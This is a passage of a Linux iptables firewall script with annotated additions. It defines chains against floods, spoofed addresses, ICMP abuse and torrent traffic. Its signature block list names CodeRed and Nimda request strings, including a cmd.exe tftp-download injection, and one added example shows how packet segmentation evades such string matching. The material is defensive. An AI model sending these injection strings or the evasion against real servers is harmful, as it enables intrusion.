# and even be part of a DDOS attack, but we accept that situation.

# The processing of NTP packets has such a low overhead that even

# when packets are coming in at a very high speed, it wont take too

# much CPU resources. There are also no states preserved as with

# the TCP protocol which could cause buffer overflows. The only

# thing which might happen is saturation of the network, but that

# would happen with a DDOS attack independent of us accepting or

# dropping the incoming packets.

#

if [ $DO_QUICK_NTP -eq 1 ]

then

$IPTABLES -A WHITELIST -p udp -m conntrack --ctstate NEW --dport 123 -j ACCEPT

fi

#

#

#------------------------------------------

# Allow unprivileged ports

#

#$IPTABLES -A UDP_OUT -p tcp -o $INET_IFACE -s $INET_IP --sport $PORTS_UNPRIV -m conntrack --ctstate NEW -j ACCEPT

#

#

#------------------------------------------

# Add trusted hosts:

#

# The "remove" clears the whitelisted host out of the recently seen

# BLACKLIST table, and because it has an ACCEPT jump target, should

# stop further processing anyway.

#

$IPTABLES -A WHITELIST -s $TRUSTED_HOSTS -m recent --remove --name BLACKLIST -j ACCEPT

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A WHITELIST -j RETURN

#

#

#------------------------------------------

fi

#

#

#*********************************************************

# Filter Enemies

#

#

#------------------------------------------

# This will allow three connections from any given IP address

# within a 60 second period, and require 60 seconds of no

# subsequent connection attempts before it will resume allowing

# connections again.

#

# The --rttl option also takes into account the TTL of the

# datagram when matching packets, so as to endeavour to mitigate

# against spoofed source addresses.

#

# Does not stop any established connections from the host

# that has made too many connections in a short period of time.

#

# Allows for whitelisting.

#

# The Linux kernel will maintain a list of portscan IPs which

# can be accessed at /proc/net/ipt_recent/BLACKLIST (/proc/net/xt_recent/BLACKLIST on current kernels)

#

#iptables -N WHITELIST

$IPTABLES -A BLACKLIST -m conntrack --ctstate NEW -m recent --set --name BLACKLIST

$IPTABLES -A BLACKLIST -m conntrack --ctstate NEW -m recent --name BLACKLIST --update --seconds $CONNECTION_TIMEOUT --hitcount $CONNECTION_MAX --rttl -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BLACKLIST a=DROP "

$IPTABLES -A BLACKLIST -m conntrack --ctstate NEW -m recent --name BLACKLIST --update --seconds $CONNECTION_TIMEOUT --hitcount $CONNECTION_MAX --rttl -j DROP

#

#

#------------------------------------------

# Block any other required ports

#

#$IPTABLES -A BLACKLIST ! -i lo -m tcp -p tcp --dport 1433 -m recent --name BLACKLIST --set -j DROP

#$IPTABLES -A BLACKLIST ! -i lo -m tcp -p tcp --dport 3306 -m recent --name BLACKLIST --set -j DROP

#$IPTABLES -A BLACKLIST ! -i lo -m tcp -p tcp --dport 8086 -m recent --name BLACKLIST --set -j DROP

#$IPTABLES -A BLACKLIST ! -i lo -m tcp -p tcp --dport 10000 -m recent --name BLACKLIST --set -j DROP

#$IPTABLES -A BLACKLIST -s 99.99.99.99 -j DROP

#

#

#------------------------------------------

# Block untrusted hosts

#

$IPTABLES -A BLACKLIST -s $UNTRUSTED_HOSTS -j DROP

#

#

#------------------------------------------

# Drop Private Network Address On Public Interface

#

#$IPTABLES -A BLACKLIST -s $LOCAL_NET -i $INET_IFACE -j LOG --log-level $LOG_LEVEL --log-prefix "fp=INET Addr on Local a=DROP "

#$IPTABLES -A BLACKLIST -s $LOCAL_NET -i $INET_IFACE -j DROP

#

#

#------------------------------------------

# Block any flooding

#

if [ $BLOCK_FLOODS -eq 1 ]

then

$IPTABLES -A BLACKLIST -j FLOODS

fi

#

#

#------------------------------------------

# Block Viruses

#

if [ $BLOCK_VIRUSES -eq 1 ]

then

$IPTABLES -A BLACKLIST -j VIRUS

fi

#

#

#------------------------------------------

if [ $BLOCK_FACEBOOK -eq 1 ]

then

$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 66.220.144.0-66.220.159.255 --dport 443 -j DROP

$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 69.63.176.0-69.63.191.255 --dport 443 -j DROP

$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 204.15.20.0-204.15.23.255 --dport 443 -j DROP

$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 66.220.144.0-66.220.159.255 --dport 80 -j DROP

$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 69.63.176.0-69.63.191.255 --dport 80 -j DROP

$IPTABLES -A BLACKLIST -p tcp -m iprange --dst-range 204.15.20.0-204.15.23.255 --dport 80 -j DROP

fi

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A BLACKLIST -j RETURN

#

#

#*********************************************************

# Filter Floods

#

#

if [ $BLOCK_FLOODS -eq 1 ]

then

# Allow 4 TCP connects per second, no more

#

#$IPTABLES -A FLOODS -m limit --limit 1/s --limit-burst 4 -j RETURN

#

#------------------------------------------

#

# Block DDOS - SYN-flood

#

$IPTABLES -A FLOODS -p tcp --syn -m connlimit --connlimit-above 9 -j LOG --log-level $LOG_LEVEL --log-prefix "fp=TCP:SYN flood:1 a=DROP "

$IPTABLES -A FLOODS -p tcp --syn -m connlimit --connlimit-above 9 -j DROP

#

#

#------------------------------------------

#

# TCP flood protection. Accept $LIMIT_PING packets/sec (burst $LIMIT_PING_BURST); the rest are logged and dropped.
# Note: "-m limit" is one global token bucket, not a per-source one, so a single noisy host can starve everyone else.
# Everything over the limit is dropped here, so the later TCP rules in this chain are not reached.

#

$IPTABLES -A FLOODS -p tcp -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j RETURN

$IPTABLES -A FLOODS -p tcp -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=TCP-IN:PING-flood a=DROP "

# The DROP must be unconditional: "-m limit" without --limit defaults to 3/hour, which would let almost everything through.

$IPTABLES -A FLOODS -p tcp -j DROP

#

#

#------------------------------------------

#

# UDP flood protection. Accept $LIMIT_PING packets/sec (burst $LIMIT_PING_BURST); the rest are logged and dropped.
# Same caveat as for TCP: the limit is global, not per source, and the later UDP rules in this chain are not reached.

#

$IPTABLES -A FLOODS -p udp -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j RETURN

$IPTABLES -A FLOODS -p udp -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDP-IN:PING-flood a=DROP "

# The DROP must be unconditional: "-m limit" without --limit defaults to 3/hour.

$IPTABLES -A FLOODS -p udp -j DROP

#

#

#------------------------------------------

#

# Second TCP rate check, intended to give flooders a 3-minute ban.

# Note: the blacklist_180 list is only ever --set here and never checked (the --update rule below is
# commented out), so no ban actually results until such a rule is enabled on the input path.

#

$IPTABLES -A FLOODS -p tcp -m limit --limit 2/s --limit-burst 6 -m comment --comment "fp=Limit TCP rate" -j RETURN

$IPTABLES -A FLOODS -p tcp -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "fp=TCP flood:1 a=DROP "

$IPTABLES -A FLOODS -p tcp -m recent --name blacklist_180 --set -m comment --comment "fp=Blacklist TCP 180 a=DROP" -j DROP

#iptables -A ssh -m recent --update --name blacklist --seconds 600 --hitcount 1 -j DROP

#

#

#------------------------------------------

#

# Limit UDP rate to 10/sec with burst at 20 (sometimes it is not enough, if you know a better average rate, let me know!)

# 3 minutes ban for flooders

#

$IPTABLES -A FLOODS -p udp -m limit --limit 10/s --limit-burst 20 -m comment --comment "fp=Limit UDP rate" -j RETURN

$IPTABLES -A FLOODS -p udp -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "fp=UDP Flood:1 a=DROP"

$IPTABLES -A FLOODS -p udp -m recent --name blacklist_180 --set -m comment --comment "fp=Blacklist UDP 180 a=DROP" -j DROP

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A FLOODS -j RETURN

#

#

fi

#

#

#*********************************************************

# Create a chain to filter known Viruses

#

#

if [ $BLOCK_VIRUSES -eq 1 ]

then

# One of the most powerful netfilter features allows you to match

# packets based on their content.

#

# Use the string match (xt_string, in mainline kernels since 2.6.14) to drop

# packets that contain a given string.

#

#

#------------------------------------------

# DROP HTTP packets related to CodeRed and Nimda viruses silently

#

#$IPTABLES -A VIRUS -t filter -p tcp -i $INET_IFACE -d $LOCAL_IP --dport 80 -m string --string "/default.ida?" --algo $STRING_ALGO -j DROP

#$IPTABLES -A VIRUS -t filter -p tcp -i $INET_IFACE -d $LOCAL_IP --dport 80 -m string --string ".exe?/c+dir" --algo $STRING_ALGO -j DROP

#$IPTABLES -A VIRUS -t filter -p tcp -i $INET_IFACE -d $LOCAL_IP --dport 80 -m string --string ".exe?/c+tftp" --algo $STRING_ALGO -j DROP

#

#

#------------------------------------------

# If you port forward your HTTP requests to an internal host,

# filter out the CodeRed virus in the FORWARD chain with this rule:

#

#$IPTABLES -A FORWARD -t filter -p tcp --dport 80 -m string --string "/default.ida?" --algo $STRING_ALGO -j DROP

#

#

#------------------------------------------

# Torrent ALGO strings using Boyer-Moore
# Note: these are plain substring matches on any payload, so short strings such as
# "torrent" or "announce" also drop legitimate traffic (a web page containing the word).

#

$IPTABLES -A VIRUS -t filter -m string --algo bm --string "BitTorrent" -j DROP

$IPTABLES -A VIRUS -t filter -m string --algo bm --string "BitTorrent protocol" -j DROP

$IPTABLES -A VIRUS -t filter -m string --algo bm --string "peer_id=" -j DROP

$IPTABLES -A VIRUS -t filter -m string --algo bm --string ".torrent" -j DROP

$IPTABLES -A VIRUS -t filter -m string --algo bm --string "announce.php?passkey=" -j DROP

$IPTABLES -A VIRUS -t filter -m string --algo bm --string "torrent" -j DROP

$IPTABLES -A VIRUS -t filter -m string --algo bm --string "announce" -j DROP

$IPTABLES -A VIRUS -t filter -m string --algo bm --string "info_hash" -j DROP

$IPTABLES -A VIRUS -t filter -m string --algo bm --string "/default.ida?" -j DROP

$IPTABLES -A VIRUS -t filter -m string --algo bm --string ".exe?/c+dir" -j DROP

$IPTABLES -A VIRUS -t filter -m string --algo bm --string ".exe?/c+tftp" -j DROP

#

# Torrent Keys (--algo kmp). peer_id, BitTorrent and announce.php?passkey=

# repeat bm matches above; any packet containing them was already dropped,

# so these copies never match and are kept only for reference.

#

$IPTABLES -A VIRUS -t filter -m string --string "peer_id" --algo kmp -j DROP

$IPTABLES -A VIRUS -t filter -m string --string "BitTorrent" --algo kmp -j DROP

$IPTABLES -A VIRUS -t filter -m string --string "BitTorrent protocol" --algo kmp -j DROP

$IPTABLES -A VIRUS -t filter -m string --string "bittorrent-announce" --algo kmp -j DROP

$IPTABLES -A VIRUS -t filter -m string --string "announce.php?passkey=" --algo kmp -j DROP

#

# Distributed Hash Table (DHT) Keywords

#

$IPTABLES -A VIRUS -t filter -m string --string "find_node" --algo kmp -j DROP

$IPTABLES -A VIRUS -t filter -m string --string "info_hash" --algo kmp -j DROP

$IPTABLES -A VIRUS -t filter -m string --string "get_peers" --algo kmp -j DROP

$IPTABLES -A VIRUS -t filter -m string --string "announce" --algo kmp -j DROP

$IPTABLES -A VIRUS -t filter -m string --string "announce_peers" --algo kmp -j DROP

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A VIRUS -j RETURN

#

#

fi

#

#
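The string rules above only ever see one packet at a time. Added example, not part of the ShareWiz script: a small POSIX-sh model of that limitation. The function slices a payload into fixed-size pieces (an assumption standing in for real TCP segmentation) and reports whether the signature lands wholly inside one piece, as xt_string would see it; `stream_match` shows what a reassembling inspector or proxy would see instead. The request line and the segment sizes are constructed here; `/default.ida?` is the CodeRed string the chain above uses.

```shell
#!/bin/sh
# Added example (not the ShareWiz script): per-segment string matching,
# the way xt_string sees traffic, versus matching on the whole stream.

# string_match_per_segment PAYLOAD SIG SEGLEN
# Splits PAYLOAD into SEGLEN-byte pieces (each standing in for one packet)
# and prints "hit" if SIG occurs entirely inside a single piece, "miss"
# otherwise. Always returns 0; the printed word is the result.
string_match_per_segment() {
    payload=$1; sig=$2; seglen=$3
    len=${#payload}
    pos=1
    while [ "$pos" -le "$len" ]; do
        end=$((pos + seglen - 1))
        chunk=$(printf '%s' "$payload" | cut -c "$pos-$end")
        case "$chunk" in
            *"$sig"*) echo hit; return 0 ;;
        esac
        pos=$((pos + seglen))
    done
    echo miss
    return 0
}

# stream_match PAYLOAD SIG: the same test against the reassembled payload.
stream_match() {
    case "$1" in
        *"$2"*) echo hit; return 0 ;;
    esac
    echo miss
    return 0
}

# Constructed CodeRed-style request line (not a real capture).
CODERED_REQ='GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0'
CODERED_SIG='/default.ida?'

# Whole request in one 1460-byte segment: matched.
string_match_per_segment "$CODERED_REQ" "$CODERED_SIG" 1460
# Signature split between two 10-byte segments: missed by per-packet
# matching, although the stream as a whole contains it.
string_match_per_segment "$CODERED_REQ" "$CODERED_SIG" 10
stream_match "$CODERED_REQ" "$CODERED_SIG"
```

Run as-is it prints `hit`, `miss`, `hit`. An attacker who controls segmentation (or who simply sends a request that happens to straddle a boundary) can pass a "blocked" string through every rule in the VIRUS chain; the chain is a nuisance filter, not a content-inspection boundary.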

#*********************************************************

# Create a chain to filter PRIVATE ADDRESS packets

# This chain is for inbound (from the Internet) private packets only.

#

#

#------------------------------------------

# Drop packets whose source address is in a private, reserved, unspecified

# or multicast range: arriving on the external interface these can only be

# spoofed (or badly misrouted).

#

$IPTABLES -A PRIVATE_PACKETS -s 0.0.0.0/8 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:0 a=DROP "

$IPTABLES -A PRIVATE_PACKETS -s 0.0.0.0/8 -j DROP

#

$IPTABLES -A PRIVATE_PACKETS -s 10.0.0.0/8 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:A a=DROP "

$IPTABLES -A PRIVATE_PACKETS -s 10.0.0.0/8 -j DROP

#

$IPTABLES -A PRIVATE_PACKETS -s 169.254.0.0/16 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:169 a=DROP "

$IPTABLES -A PRIVATE_PACKETS -s 169.254.0.0/16 -j DROP

#$IPTABLES -A PRIVATE_PACKETS -s 127.0.0.0/8 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:127 a=DROP "

#$IPTABLES -A PRIVATE_PACKETS -s 127.0.0.0/8 -j DROP

#

$IPTABLES -A PRIVATE_PACKETS -s 172.16.0.0/12 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:B a=DROP "

$IPTABLES -A PRIVATE_PACKETS -s 172.16.0.0/12 -j DROP

#

# RFC 1918 class C range, disabled here. Enable both lines only if nothing

# legitimate ever reaches the external interface from 192.168.x.x (for

# example when the server is not itself on a 192.168 LAN).

#

#$IPTABLES -A PRIVATE_PACKETS -s 192.168.0.0/16 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:C a=DROP "

#$IPTABLES -A PRIVATE_PACKETS -s 192.168.0.0/16 -j DROP

#

$IPTABLES -A PRIVATE_PACKETS -s 224.0.0.0/4 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:D a=DROP "

$IPTABLES -A PRIVATE_PACKETS -s 224.0.0.0/4 -j DROP

#

#

# 239.255.255.0/24 (administratively scoped multicast) lies inside

# 224.0.0.0/4, which is already dropped above, so this pair is never

# reached; kept only for its distinct log tag.

#

$IPTABLES -A PRIVATE_PACKETS -s 239.255.255.0/24 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:239 a=DROP "

$IPTABLES -A PRIVATE_PACKETS -s 239.255.255.0/24 -j DROP

#

$IPTABLES -A PRIVATE_PACKETS -s 240.0.0.0/5 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:240 a=DROP "

$IPTABLES -A PRIVATE_PACKETS -s 240.0.0.0/5 -j DROP

#

$IPTABLES -A PRIVATE_PACKETS -s 248.0.0.0/5 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:248 a=DROP "

$IPTABLES -A PRIVATE_PACKETS -s 248.0.0.0/5 -j DROP

#

$IPTABLES -A PRIVATE_PACKETS -s 255.255.255.255/32 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=IP_SPOOF:255 a=DROP "

$IPTABLES -A PRIVATE_PACKETS -s 255.255.255.255/32 -j DROP

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A PRIVATE_PACKETS -j RETURN

#

#
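The chain above repeats the same LOG-then-DROP pair by hand for every range, which is how a lost line break turns into two commands run together, as happened with the 172.16.0.0/12 pair. Added example, not part of the ShareWiz script: a POSIX-sh generator that builds the chain from one list of ranges, validates each CIDR before handing it to iptables, and dry-runs by default (IPTABLES defaults to `echo` here; set `IPTABLES=/sbin/iptables` to apply for real). The variable names follow the script; the default values are assumptions, 240.0.0.0/5 and 248.0.0.0/5 are merged into 240.0.0.0/4, and the unreachable 239.255.255.0/24 pair is left out.

```shell
#!/bin/sh
# Added example (not the ShareWiz script): generate the PRIVATE_PACKETS
# chain from a list instead of hand-copying rule pairs.
# Assumed defaults; the real script sets these variables earlier.
IPTABLES="${IPTABLES:-echo}"          # echo = dry run; /sbin/iptables to apply
LIMIT_LOG="${LIMIT_LOG:-5/m}"
LIMIT_LOG_BURST="${LIMIT_LOG_BURST:-10}"
LOG_LEVEL="${LOG_LEVEL:-7}"

# valid_cidr A.B.C.D/N: returns 0 for a well-formed IPv4 CIDR, 1 otherwise.
# Refusing bad input here is cheaper than a half-built chain after
# iptables aborts on a malformed range.
valid_cidr() {
    addr=${1%/*}
    pfx=${1#*/}
    [ "$addr" != "$1" ] || return 1                 # no "/N" part at all
    case "$pfx" in ''|*[!0-9]*) return 1 ;; esac
    [ "$pfx" -le 32 ] || return 1
    oldifs=$IFS; IFS=.; set -f                      # split on dots, no globbing
    set -- $addr
    set +f; IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        case "$o" in ''|*[!0-9]*) return 1 ;; esac
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

# spoof_rules CHAIN CIDR TAG: rate-limited LOG followed by DROP, the same
# pair the script writes out by hand for each range.
spoof_rules() {
    chain=$1; cidr=$2; tag=$3
    valid_cidr "$cidr" || { echo "spoof_rules: bad CIDR '$cidr'" >&2; return 1; }
    $IPTABLES -A "$chain" -s "$cidr" -m limit --limit "$LIMIT_LOG" \
        --limit-burst "$LIMIT_LOG_BURST" -j LOG --log-level "$LOG_LEVEL" \
        --log-prefix "fp=IP_SPOOF:$tag a=DROP "
    $IPTABLES -A "$chain" -s "$cidr" -j DROP
}

# build_private_chain: the ranges the chain above drops, as "CIDR TAG"
# pairs. 192.168.0.0/16 is left out as on the page; add a line for it if
# the external interface never legitimately sees that range.
build_private_chain() {
    while read -r cidr tag; do
        spoof_rules PRIVATE_PACKETS "$cidr" "$tag" || return 1
    done <<EOF
0.0.0.0/8 0
10.0.0.0/8 A
169.254.0.0/16 169
172.16.0.0/12 B
224.0.0.0/4 D
240.0.0.0/4 240
255.255.255.255/32 255
EOF
    $IPTABLES -A PRIVATE_PACKETS -j RETURN
}

# Dry run: prints the 15 rules that would be added.
build_private_chain
```

Running the file unchanged prints the rules; the same approach works for the rest of the script (`IPTABLES=echo` in front of the reset script shows the complete rule set without touching the live firewall).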

#*********************************************************

# Create a chain to filter incoming ICMP packets

# This chain is for inbound (from the Internet) icmp packets only.

#

# For more info on ICMP types.

#

# http://www.iana.org/assignments/icmp-parameters/icmp-parameters.xml

# iptables -p icmp -h

#

# Type 0 is for echo-reply

# Type 1 is Unassigned

# Type 2 is Unassigned

# Type 3 is for destination-unreachable

# Type 4 is for source quench (deprecated)

# Type 5 is for redirect

# Type 6 is for alternative host address

# Type 7 is Unassigned

# Type 8 is for echo-request.

# Type 9 is for router advertisement

# Type 10 is for router solicitation

# Type 11 is for time-exceeded

# Type 12 is for parameter problem

# Type 13 is for timestamp

# Type 14 is for timestamp-reply

# Type 15 is for information-request

# Type 16 is for information-reply

# Type 17 is for address-mask-request

# Type 18 is for address-mask-reply

# Type 19 is reserved (for security)

# Type 30 is for traceroute

# Type 31 is for datagram conversion error

# Type 32 is for mobile host redirect

# Type 33 is for IPv6 where-are you

# Type 34 is for IPv6 I-am-here

# Type 35 is for mobile registration request

# Type 36 is for mobile registration reply

# Type 37 is for domain name request

# Type 38 is for domain name reply

# Type 39 is for SKIP

# Type 40 is for Photuris

# Type 41 is for ICMP messages utilized by experimental mobility protocols such as Seamoby

#

#

#--reject-with icmp-port-unreachable

#--reject-with icmp6-port-unreachable

#

#

#------------------------------------------

# Destination unreachable

#

# ICMP type 3 is necessary for path MTU discovery to work correctly.

# It should be enabled inbound to get top efficiency.

#

$IPTABLES -A ICMP_IN -p icmp --icmp-type destination-unreachable -j ACCEPT

#

#

#------------------------------------------

# Drop Smurf attack

#

$IPTABLES -A ICMP_IN -p icmp -d 0.0.0.255/0.0.0.255 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:0.255 a=DROP "

$IPTABLES -A ICMP_IN -p icmp -d 0.0.0.255/0.0.0.255 -j DROP

#

#

#------------------------------------------

# Answer ping requests.

#

# First block oversized echo-requests ("Ping of Death").

#

# Caveat: -m length matches the total IP length, and the default Linux

# ping is 84 bytes (20 IP + 8 ICMP + 56 data), so 61:65535 drops ordinary

# Linux pings while passing the 60-byte Windows ping. Raise the lower

# bound well above 85 (e.g. --length 1001:65535) if plain pings should be

# answered; the real Ping-of-Death case (fragments that reassemble beyond

# 65535 bytes) is caught by the --fragment rule at the end of this chain.

#

$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m length --length 61:65535 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:PING-death a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m length --length 61:65535 -j DROP

#

# Now Block DDOS - Smurf

#

$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m pkttype --pkt-type broadcast -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:Smurf:1 a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m pkttype --pkt-type broadcast -j DROP

#

# Ping flood protection: accept $LIMIT_PING echo-replies/sec and

# $LIMIT_PING echo-requests/sec; the rest are logged and dropped.

#

# Note: replies to pings this host sent are ESTABLISHED under conntrack,

# so if INPUT accepts ESTABLISHED traffic before jumping here the

# echo-reply rules below only ever see unsolicited replies.

#

if [ $ALLOW_PING_IN -eq 1 ]

then

$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-reply -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j ACCEPT

fi

$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:PING:1 a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-reply -j DROP

#

if [ $ALLOW_PING_IN -eq 1 ]

then

$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j ACCEPT

#$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m limit --limit 3/s -j ACCEPT # Smurf

fi

$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:PING:2 a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type echo-request -j DROP

#

#

#------------------------------------------

# Allow traceroute, though it is not required.

#

# Type 11 (Time Exceeded) is the only one accepted that would

# not already be covered by the established connection rule.

# Applied to INPUT on the external interface.

#

# Rate limit: accept $LIMIT_PING time-exceeded/sec, the rest are logged and dropped.

#

if [ $ALLOW_TRACEROUTE_IN -eq 1 ]

then

$IPTABLES -A ICMP_IN -p icmp --icmp-type 11 -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j ACCEPT

fi

$IPTABLES -A ICMP_IN -p icmp --icmp-type 11 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:time:1 a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type 11 -j DROP

#

if [ $ALLOW_TRACEROUTE_IN -eq 1 ]

then

$IPTABLES -A ICMP_IN -p icmp --icmp-type 30 -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j ACCEPT

fi

$IPTABLES -A ICMP_IN -p icmp --icmp-type 30 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:trace a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type 30 -j DROP

#

#

#------------------------------------------

# Block ICMP-Parameter-Problem

#

# Rate limit: accept $LIMIT_PING parameter-problem/sec, the rest are logged and dropped.

#

if [ $ALLOW_ICMP_PARAM_PROBLEM_IN -eq 1 ]

then

$IPTABLES -A ICMP_IN -p icmp --icmp-type parameter-problem -m limit --limit $LIMIT_PING --limit-burst $LIMIT_PING_BURST -j ACCEPT

fi

$IPTABLES -A ICMP_IN -p icmp --icmp-type parameter-problem -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:params a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type parameter-problem -j DROP

#

#

#------------------------------------------

# Block ICMP-Redirects (Should already be caught by sysctl-options, if enabled)

#

#

$IPTABLES -A ICMP_IN -p icmp --icmp-type redirect -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:redirect a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type redirect -j DROP

#

#

#------------------------------------------

# Block ICMP-TTL-Expired (type 11, codes 0 and 1). Both are already matched by the plain "--icmp-type 11" rules above (accepted or dropped depending on $ALLOW_TRACEROUTE_IN), so these never fire; kept for completeness. Windows tracert probes with ICMP echo rather than UDP, but the time-exceeded replies are the same either way.

#

$IPTABLES -A ICMP_IN -p icmp --icmp-type ttl-zero-during-transit -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:ttl:1 a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type ttl-zero-during-transit -j DROP

$IPTABLES -A ICMP_IN -p icmp --icmp-type ttl-zero-during-reassembly -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:ttl:2 a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type ttl-zero-during-reassembly -j DROP

#

#

#------------------------------------------

# Block ICMP-Timestamp (used for remote clock and OS fingerprinting). Unlike redirects there is no sysctl to disable timestamp replies, so it has to be filtered here.

#

$IPTABLES -A ICMP_IN -p icmp --icmp-type timestamp-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:ts:1 a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type timestamp-request -j DROP

$IPTABLES -A ICMP_IN -p icmp --icmp-type timestamp-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:ts:2 a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type timestamp-reply -j DROP

#

#

#------------------------------------------

# Block ICMP-address-mask (can help to prevent OS-fingerprinting)

#

$IPTABLES -A ICMP_IN -p icmp --icmp-type address-mask-request -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:addr:1 a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type address-mask-request -j DROP

$IPTABLES -A ICMP_IN -p icmp --icmp-type address-mask-reply -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP-IN:addr:2 a=DROP "

$IPTABLES -A ICMP_IN -p icmp --icmp-type address-mask-reply -j DROP

#

#

#------------------------------------------

# Block DOS - Jolt

#

#

# ICMP packets should fit in a Layer 2 frame, thus they should

# never be fragmented. Fragmented ICMP packets are a typical sign

# of a denial of service attack.

#

$IPTABLES -A ICMP_IN -p icmp --fragment -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=ICMP:frag a=DROP "

